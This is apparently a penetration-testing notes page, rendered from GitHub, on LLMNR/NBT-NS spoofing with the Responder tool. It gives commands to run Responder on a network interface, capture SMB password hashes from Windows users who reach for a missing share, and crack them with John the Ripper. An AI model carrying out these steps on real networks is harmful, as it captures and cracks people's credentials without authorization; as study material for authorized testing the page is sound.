Skip to content

Latest commit

 

History

History
22 lines (15 loc) · 691 Bytes

File metadata and controls

22 lines (15 loc) · 691 Bytes
description

↗ Responder LLMNR

LLMNR / NBT-NS Spoofing

Responder : rogue authentication server to capture hashes

This can be used to get the already logged-in user's password, who is trying to access a shared resource which is not present Step by Step

# In Parrot/Kali OS, 
responder -I eth0

# In windows, try to access the shared resource, logs are stored at usr/share/responder/logs/SMB<filename>
# To crack that hash, use JohntheRipper
john SMB<filename>

{% embed url="https://www.kali.org/tools/responder/" %}